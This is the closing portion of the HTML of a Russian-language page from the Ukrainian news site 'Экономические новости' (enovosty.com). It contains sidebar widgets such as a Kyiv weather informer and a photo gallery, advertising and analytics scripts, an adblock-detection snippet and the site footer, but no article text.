}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script><br> <div id="M469261ScriptRootC781152"> <div id="M469261PreloadC781152"> Loading... </div> </div> <script> (function () { var script = document.createElement('script'); script.src = "//jsc.idealmedia.io/e/n/enovosty.com.781152.js?t=" + ((d = new Date()) ? '' + d.getUTCFullYear() + d.getUTCMonth() + d.getUTCDate() + d.getUTCHours() : ''); script.async = true; document.body.appendChild(script); })(); </script> </br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><script>jQuery(document).ready(function($){$('#slider_gallery').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery div.anythingSlider-minimalist-round span.arrow{height:170px}</style><div class="topnews_single slide gallery" style="width: 258px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery"><li><ul class="tact"><li id="li0" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/teni/thumbs/thumbs_shadows08.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Художник, который рисует тенью"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=557&pid=12137" title="Художник, который рисует тенью" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Художник, который рисует тенью</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/eda_art/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Еда которая порадуют перфекциониста"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=556&pid=12114" title="Еда которая порадуют перфекциониста" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Еда которая порадуют перфекциониста</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=555&pid=12093" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/razrez/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Заглянуть внутрь! Предметы, которые разрезали напополам"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=555&pid=12093" title="Заглянуть внутрь! Предметы, которые разрезали напополам" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Заглянуть внутрь! Предметы, которые разрезали напополам</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=554&pid=12072" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/fotosh_sobaka/thumbs/thumbs_jujichris00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Невероятные приключениях фотографа и его «гигантской» собаки"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=554&pid=12072" title="Невероятные приключениях фотографа и его «гигантской» собаки" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Невероятные приключениях фотографа и его «гигантской» собаки</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4805539"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4805539","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "804c361205";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!-- <script type="text/javascript" language="javascript" charset="UTF-8" src="http://js.ru.redtram.com/n4p/e/i/eizvestia.com_20895.js" async></script> --><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><div id="vid_vpaut_div" style="display:inline-block;width:400px;height:240px" vid_vpaut_pl="6160"></div><script type="text/javascript" src="https://videoroll.net/js/vid_vpaut_script.js" async></script><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script></body></html>